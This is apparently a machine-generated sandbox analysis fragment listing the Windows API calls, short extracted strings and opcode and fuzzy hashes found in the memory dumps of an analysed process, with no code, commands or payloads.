              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 43427a965aa48ed651fef582957056a05864c1e151e51d0aa9614d15a2fb0fa0
              • Instruction ID: f57e556c95b20daa35cd54986dc6020b1e0fdcab57db7f2e6594bb703e8bee57
              • Opcode Fuzzy Hash: 43427a965aa48ed651fef582957056a05864c1e151e51d0aa9614d15a2fb0fa0
              • Instruction Fuzzy Hash: 2F01D271500304AFE721CF1ADC89FA6FBA8EF44720F54C09AED459B246E278E444CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: closesocket
              • String ID:
              • API String ID: 2781271927-0
              • Opcode ID: c9b25506254b6e42bff9170cf3864a4f7532b20c77b8f287f2f3150ae526a381
              • Instruction ID: b0eace30527d8c8b898ae534bc2152c442acdf9a7c85dc3b2e70ab6eb7e911a6
              • Opcode Fuzzy Hash: c9b25506254b6e42bff9170cf3864a4f7532b20c77b8f287f2f3150ae526a381
              • Instruction Fuzzy Hash: 27119E71449384AFD712CF15DC84B92BFB4EF06224F1884ABED858F253D275A849CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,B4FCE2B2,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 057D14A6
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: 48f25d39adfbde62af9eb753f01c111faa335f6a42151b4a426985cc2cf941ec
              • Instruction ID: 56ef18570642fb895a908d76bb96389ad2253ba8b5d7e1aef14eb288fe995f9c
              • Opcode Fuzzy Hash: 48f25d39adfbde62af9eb753f01c111faa335f6a42151b4a426985cc2cf941ec
              • Instruction Fuzzy Hash: 1E116D756003449FDB60CF6AD884B66FBE4EF04320F58C4AADD498B656D274E444DB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(?), ref: 014BA3A4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 491d4681805e3faef3d292e5ded10bea19b6c89daaf9e6f4411c0a1e55954b48
              • Instruction ID: 4753eaaa54d8baead502393e6cd9a65a2b70517d290b8226fb79899b740f14b3
              • Opcode Fuzzy Hash: 491d4681805e3faef3d292e5ded10bea19b6c89daaf9e6f4411c0a1e55954b48
              • Instruction Fuzzy Hash: 97116171409384AFD7228B15DC84B62FFA4DF46624F1884DAED858F663D275A818CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 014BA926
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: e1784b5169a2f4c31dd391a37b140aeec0bb369c43e17d95b483714574b47bfa
              • Instruction ID: f31290ca159cfc73ebffbcc2026eac6ac90b99f0edc9e4f7fbd7651909dc17e7
              • Opcode Fuzzy Hash: e1784b5169a2f4c31dd391a37b140aeec0bb369c43e17d95b483714574b47bfa
              • Instruction Fuzzy Hash: B7118E35409784AFD7228F15DC85B52FFB4EF06220F09C4DAED854B263C375A859DB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 057D0B6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileNameTemp
              • String ID:
              • API String ID: 745986568-0
              • Opcode ID: 1bd85563bd9b922ad3ee79178bf9d6d5dd82c1b1e56f9766f1d710c0f733498d
              • Instruction ID: 4559620cfa8b9cdfa79363e44da294381e41124ba2838079614e757e33d4b17e
              • Opcode Fuzzy Hash: 1bd85563bd9b922ad3ee79178bf9d6d5dd82c1b1e56f9766f1d710c0f733498d
              • Instruction Fuzzy Hash: D901B171900600ABD310DF1ADC81B26FBA8FB88B20F14812AED088B641D231B916CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 057D2E6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: 34d2c5352f1abedbbca5be064fea4663384b43279b27e820798ef77bb8bd274a
              • Instruction ID: 2cba206f8da995cfa2c5d40deebb38c57adf0388b22fab35697fcea2fb11e046
              • Opcode Fuzzy Hash: 34d2c5352f1abedbbca5be064fea4663384b43279b27e820798ef77bb8bd274a
              • Instruction Fuzzy Hash: 7401B171900604ABD310DF1ADC81B26FBA8EB88B20F14812AED088B641D231B916CBE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 014BA1C2
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: 1304aeb48bb6b968f3de494e574b7ddd67fb477e90af5e21137a6f8b92602070
              • Instruction ID: f2cab0d15b2f629101d0b3bd20558d64e596126b402708939b04dcc57d143bd9
              • Opcode Fuzzy Hash: 1304aeb48bb6b968f3de494e574b7ddd67fb477e90af5e21137a6f8b92602070
              • Instruction Fuzzy Hash: 7B01B171900600ABD710DF1ADC81B26FBA8EB88A20F14816AED088B641D231B916CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 014BBF0C
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 997ac8e679204f7342d1745b5b8306f7041c42ba867506ea9ca87c557b16babd
              • Instruction ID: e7fa81acdd3f3297ae40d3ed1d0c759482783e5ace66d65b97d700905521ff32
              • Opcode Fuzzy Hash: 997ac8e679204f7342d1745b5b8306f7041c42ba867506ea9ca87c557b16babd
              • Instruction Fuzzy Hash: C8015E71A003409FEB60CF6AD8857A6FB98EF04220F0884ABDD49CB756D675E444CE72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 014BB78A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: a687a7c462238afa70fe4c1fd5be1a841891a7c91892f1fb2fe15fd4d995e237
              • Instruction ID: 70122d7db2aca1d351ab2db383dad3b89eda61373ecdf22652824c4962389d76
              • Opcode Fuzzy Hash: a687a7c462238afa70fe4c1fd5be1a841891a7c91892f1fb2fe15fd4d995e237
              • Instruction Fuzzy Hash: 66015B324007009FDB218F95D884B96FBA0EF08320F0888AADE854BA26D375E419DF72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BA58A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: a01e93499bd5c57dc4124f57d8402ad4980f89c55d73419ad6b4d77f12c7dcfa
              • Instruction ID: 52a9e03be0bd0457263e94801635c7d1b776f058fc841ce56436ce1e629c7a1b
              • Opcode Fuzzy Hash: a01e93499bd5c57dc4124f57d8402ad4980f89c55d73419ad6b4d77f12c7dcfa
              • Instruction Fuzzy Hash: C00139325007009FDB218F95D884B56FBE0EF08320F1888AADD894BA66D375A519CF62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 057D1896
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Query_
              • String ID:
              • API String ID: 428220571-0
              • Opcode ID: dfac528c8a87afeb3aff2beea8ac2400e250142ea5568d8f14b00af1304d9eef
              • Instruction ID: 33d9bc7f895469a913e94c2a6070995e7d41b4cd4fc403445e511a100e8b31f8
              • Opcode Fuzzy Hash: dfac528c8a87afeb3aff2beea8ac2400e250142ea5568d8f14b00af1304d9eef
              • Instruction Fuzzy Hash: 5F01A271500605ABD214DF1ADC82B26FBA8FB89B20F14811AED084B741D271F516CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D0264
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 1a0e42a7e7ec6d2ea7ad8871009ab7ecc66fbc2fd700e42f0a9566970e953bc0
              • Instruction ID: 446ddf4b6949fbe630ad8d2979ef2c5abce5501c9649287581eda9d078438f7f
              • Opcode Fuzzy Hash: 1a0e42a7e7ec6d2ea7ad8871009ab7ecc66fbc2fd700e42f0a9566970e953bc0
              • Instruction Fuzzy Hash: 5201D4719013009FDB50CF19D888B65FBA4EF40320F08C4ABDC458F646E274F444DA71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D13EC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 72997fd3ae9e934ac6057c0e6ef370f547f86f97d55e4a735a87d7b6d205753d
              • Instruction ID: 3d8f2b57ff92c0fb9ee00035bf499d94ac65f3712b1081ef8e9816f805f722f3
              • Opcode Fuzzy Hash: 72997fd3ae9e934ac6057c0e6ef370f547f86f97d55e4a735a87d7b6d205753d
              • Instruction Fuzzy Hash: AD018F75A043408FDB60CF5AE984B66FBA4EF04321F08C4AADD498FA46D274E458CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 014BAFEA
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 0b809585666da7c50f3a7b7f1e40ac733b96eec59ee8d652efd32b34340638b0
              • Instruction ID: c68daf4ed38cbbeb2dffaca06a531f961f3938014476b57316207a3eb606da41
              • Opcode Fuzzy Hash: 0b809585666da7c50f3a7b7f1e40ac733b96eec59ee8d652efd32b34340638b0
              • Instruction Fuzzy Hash: D701A271500605ABD214DF1ADC82B26FBA8FB89B20F14815AED084B741D271F516CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 014BBBB9
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 9cca9a286c351f15d46c4a0a6ae63c91bc9d17cb217a200daa0dd52165fb4b79
              • Instruction ID: ec881cbc3f7e8349afe829e2d62e3d3449252ea0d5a5772d0faff65607d503f0
              • Opcode Fuzzy Hash: 9cca9a286c351f15d46c4a0a6ae63c91bc9d17cb217a200daa0dd52165fb4b79
              • Instruction Fuzzy Hash: DA015E365047409FDB318F5AD885BA6FBA4EF04320F08C49ADD464BA66D275E458CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: closesocket
              • String ID:
              • API String ID: 2781271927-0
              • Opcode ID: 98e3d036dcdc03250bcfecc8c7b822304045f5f255a609b97373b4c989a01c18
              • Instruction ID: ef3370e3dc13b2216eb68b0dbdf4f15d45cf53cdc4b9c403b619c6584edc50f8
              • Opcode Fuzzy Hash: 98e3d036dcdc03250bcfecc8c7b822304045f5f255a609b97373b4c989a01c18
              • Instruction Fuzzy Hash: 79016D759043449FDB20CF5AD8847A6FBA4EF04320F18C4ABDD4A8F656D279E448CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 014BB841
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 8415b80b00e80f3a577af41edce3dc96b0813b50525833c22b3bf170a927e406
              • Instruction ID: a720a2aad8cf8552b166ac36d41bd6c15e29e3f58dfb2d2e16cafad8ae10c4a6
              • Opcode Fuzzy Hash: 8415b80b00e80f3a577af41edce3dc96b0813b50525833c22b3bf170a927e406
              • Instruction Fuzzy Hash: 7E012C359007449FDB218F56D884BA6FBA0EF04720F08C49ADD454B666D275A458DBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 014BA926
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 699ac36ba7b1014b1dd3f29ee3cecc7ef1e0280302e837e6528cdbe7b7c366b3
              • Instruction ID: c21468b5c51038a1356d4f247950ac06b65a9fc81069dba7c320f254aa899ab3
              • Opcode Fuzzy Hash: 699ac36ba7b1014b1dd3f29ee3cecc7ef1e0280302e837e6528cdbe7b7c366b3
              • Instruction Fuzzy Hash: EF018B359007049FDB208F0AD885792FFA0EF04320F18C8AADD860B666D275A419DA72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(?), ref: 014BA3A4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction ID: 846632142687a3828dd991d2ae69b4c16987d5693f3368fcd29b12415b60bb7a
              • Opcode Fuzzy Hash: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction Fuzzy Hash: F5F081355013449FD7208F1AD8847A5FF90DF04320F58D09ADD454BB56D2B9A458CA72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 014BBE70
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction ID: ee3bfb961d18b9c6449f902b2d1afb862f7c446675779ac12bb6339c24d1fd0c
              • Opcode Fuzzy Hash: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction Fuzzy Hash: 36F08C359043449FDB208F0AD8847A2FBA0EF04330F08C4AADE494B766D279A448CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: c4aa68a36c9a62345fc96d9c1cc4dc589ebc0d1d281ddef171f3151a5ebec9ac
              • Instruction ID: 840b2a00831a6115c398a38b548c21480f701b4d29e5d59a72174a8869c8d4e6
              • Opcode Fuzzy Hash: c4aa68a36c9a62345fc96d9c1cc4dc589ebc0d1d281ddef171f3151a5ebec9ac
              • Instruction Fuzzy Hash: F7719031B052058FDB08DB69C4546AEBBE3FFC9710F24846ED506EB360DA75AC42CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: MOC
              • API String ID: 0-624257665
              • Opcode ID: a72d3c41b49aa85d7d67cafcfa38e9a07341c0ee48911082359e64c618908b96
              • Instruction ID: accfc614e176402b855133e155ebea830f99eab50f76e15a83afa196df2fa810
              • Opcode Fuzzy Hash: a72d3c41b49aa85d7d67cafcfa38e9a07341c0ee48911082359e64c618908b96
              • Instruction Fuzzy Hash: 05717B39A04A05DFC715DF6AC89496AFBF2BF88300B24892DD55787A60DB31EC42CF56
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: r*+
              • API String ID: 0-3221063712
              • Opcode ID: c6fed4c13614ea231619af401748680486868644e05438febc38744a00d67425
              • Instruction ID: b88d21831e3979788fdb02fbd20f32edd6a43c94b476803c06b0435fe506e84a
              • Opcode Fuzzy Hash: c6fed4c13614ea231619af401748680486868644e05438febc38744a00d67425
              • Instruction Fuzzy Hash: 5D412B71E0420ADFDB98DBA5C5596AEBBF2FF44300F1084AAD802A7260DB749E42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: r*+
              • API String ID: 0-3221063712
              • Opcode ID: 86b1b1b5165d42441c7e8fcc6992a59886533230cca60d21a3e93a994a825d91
              • Instruction ID: 203e4acb1177304c5ff02224d3af96ed775f1cfd79975f5ca0557fbcc46b1486
              • Opcode Fuzzy Hash: 86b1b1b5165d42441c7e8fcc6992a59886533230cca60d21a3e93a994a825d91
              • Instruction Fuzzy Hash: 33412C35E48209CFCB64DFA5C0656AEBBB2FF45304F1080AAD402A7664E7359E46CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID: j
              • API String ID: 0-2137352139
              • Opcode ID: b98aa2eba6a9a1cd1553e3f3bbff5ac65ff6b65876dcb40f4d39bbdbd0f77e40
              • Instruction ID: dc5a6952e29d76a129115577f763bc52dbf95caf9b17c2e10617880a15465c7c
              • Opcode Fuzzy Hash: b98aa2eba6a9a1cd1553e3f3bbff5ac65ff6b65876dcb40f4d39bbdbd0f77e40
              • Instruction Fuzzy Hash: 7E31F970A01B10CFE7B9CF3AC554256FBF2BF84304F54886EC68A86AA1DB76A445CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a413f5956e58f5b043d83c7cf911f3b2bb50b861b69c2086c6473ff103ddb1e
              • Instruction ID: ef7b3094bbeacd36335ac08a2687eb67790ab48163fc05e20821e9b842434cdc
              • Opcode Fuzzy Hash: 6a413f5956e58f5b043d83c7cf911f3b2bb50b861b69c2086c6473ff103ddb1e
              • Instruction Fuzzy Hash: 14312C76A04205DFCB94DF68C584AAEBBF2BB88214F149169D80AE7B41DB31DC42CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0bd0eb197de834d8f129fffa2f77e448fec2e00ce0d3d1391a0e34a162aef22a
              • Instruction ID: daf1ffe92a6407c6b368672a1bcc5e43459ad64ca3681cdc3e976c2b4e867d53
              • Opcode Fuzzy Hash: 0bd0eb197de834d8f129fffa2f77e448fec2e00ce0d3d1391a0e34a162aef22a
              • Instruction Fuzzy Hash: A2310C70F04209DFDB94CF69C480AADBBF1BF48304F208569DA1AEB251DA71E9858F91
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 758dd24da6d580272309273f6c1ffd947008adffeb7f1e4cc7a31375e3e91da0
              • Instruction ID: 27ff6fda74349f425e5f2da35ecba9ea1d0afd88c11ec829eb38ceced8394a4a
              • Opcode Fuzzy Hash: 758dd24da6d580272309273f6c1ffd947008adffeb7f1e4cc7a31375e3e91da0
              • Instruction Fuzzy Hash: 1E218136F0411A9FDF44DAA9DC81AFEB3BAFBC8241F10413AD619D3240EAB05D56CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 215b67132f75c502221eb4dcd10fc8833cc6af00743c83c6982a4e7b6c072805
              • Instruction ID: bc691150f6908c238fd8ed70c96ca99288827afc9531c16460c3310d3503e414
              • Opcode Fuzzy Hash: 215b67132f75c502221eb4dcd10fc8833cc6af00743c83c6982a4e7b6c072805
              • Instruction Fuzzy Hash: A2312D32E002598FDB14DBB9C4545AEB7F3EF88310B14856AD80AAB355DA31AC46CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2dc048a084c3afdfde92804d5275e08148fafa9a226c28fed25f2a72ff800511
              • Instruction ID: 1e1926dc9316ece218ef5822fc5f04133578102b2a16ad0a2af43a11b0367447
              • Opcode Fuzzy Hash: 2dc048a084c3afdfde92804d5275e08148fafa9a226c28fed25f2a72ff800511
              • Instruction Fuzzy Hash: F4415B30A04B40CFE3B9CF2AC55436AB7F2BF84305F44C86EC29A87A91CB75A441CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5fd01869eaed343a9544e3f4936cf2b9dcbe33833caaa79f6bd30de659e16e9
              • Instruction ID: e3bcec26592ab7e47724bcae375fadcb08ba13d4baadc68d7020691c5188a004
              • Opcode Fuzzy Hash: c5fd01869eaed343a9544e3f4936cf2b9dcbe33833caaa79f6bd30de659e16e9
              • Instruction Fuzzy Hash: 35214876A003099FDF04EFA9C4146AEBBF6AF99300F514529D40AAB355EB70AD46CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b34c3559b54d7b96d0223e56ec74b7ed47db2c89169fbd6ea680e311c86c2f2
              • Instruction ID: 7b298b2ba12f9599a6dd4119200c5d01dced95dce001484dc03f82493151f0ac
              • Opcode Fuzzy Hash: 3b34c3559b54d7b96d0223e56ec74b7ed47db2c89169fbd6ea680e311c86c2f2
              • Instruction Fuzzy Hash: A2315C31B00605CFCB54DFA9D585AAEBBF6BF88604B50452DE506A7750EB32EC42CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b8bebaf17a6775525f07c4f501738728cbc47a84412f58b8772d930758053b0
              • Instruction ID: 97b96b51b5367df4e5a53ec2008bafb17caa9021327a4a0c97f885bb3b3e8fba
              • Opcode Fuzzy Hash: 5b8bebaf17a6775525f07c4f501738728cbc47a84412f58b8772d930758053b0
              • Instruction Fuzzy Hash: 3F219A36B012158BCF58DAB994906FEB6E7AFA8221B50843EC407E7350DE358C02CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60bd536dad631d25bef85c8b42704d29f98f05e3b066ff529ad5a9e97377f28e
              • Instruction ID: 171d6f0bb75e16041b0aa6ded47d61b6cf1f607beeb6e123cb988f1b3e85b279
              • Opcode Fuzzy Hash: 60bd536dad631d25bef85c8b42704d29f98f05e3b066ff529ad5a9e97377f28e
              • Instruction Fuzzy Hash: 0A21AB36B042019FCF54E7B5941866E7BE3AF94651B2488BAD407CB7A4EE398C42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66fe9e339f5d2d893ebbe3e3797e20f9e20a0e95b3662b7c8b51a8397728fcd8
              • Instruction ID: 885bbb5b95eb7716d6903f04b96eed829d65bb25f49160d8d607b4ed70cb8522
              • Opcode Fuzzy Hash: 66fe9e339f5d2d893ebbe3e3797e20f9e20a0e95b3662b7c8b51a8397728fcd8
              • Instruction Fuzzy Hash: 1E3129302057018BC7A8AB39C5A066A7BE3BFD47447648D2DD2868F758DF72EC038B80
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20c3102c06951d240370839a8f0f9bb0dd10be6de2d31986c1a174d9938dcb98
              • Instruction ID: b7772ccc54827c144ca15642d0f1715eae27b909e786dab20d85221a3605d418
              • Opcode Fuzzy Hash: 20c3102c06951d240370839a8f0f9bb0dd10be6de2d31986c1a174d9938dcb98
              • Instruction Fuzzy Hash: 8031AE71D09345CFCB85CBA4C4646ADBFF1FF46310F10849AD8029B2A1EA748E42CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2e40032e753a16fa1d92ad9d044e3d8355f29e9d064de44320bcfaea4c64d54
              • Instruction ID: 72c1e128381522f5c7d9ffdce11779824b2e82246a406ea0cea1289c72e1069b
              • Opcode Fuzzy Hash: f2e40032e753a16fa1d92ad9d044e3d8355f29e9d064de44320bcfaea4c64d54
              • Instruction Fuzzy Hash: BC319F36900155CFDB50EF68E84889D7BB3FF84305B148169E4065B279DF35AC26DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction ID: 42b1dc7a338a81e3441dae0e9effc605c58d59a6767e09874405063499e893d4
              • Opcode Fuzzy Hash: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction Fuzzy Hash: 6B31DF35B002459FDB54DFB9C0546AEBBE2BB88304F54816DD10AAB394DB34AD46CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction ID: 42b1dc7a338a81e3441dae0e9effc605c58d59a6767e09874405063499e893d4
              • Opcode Fuzzy Hash: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction Fuzzy Hash: 6B31DF35B002459FDB54DFB9C0546AEBBE2BB88304F54816DD10AAB394DB34AD46CF81
              Uniqueness
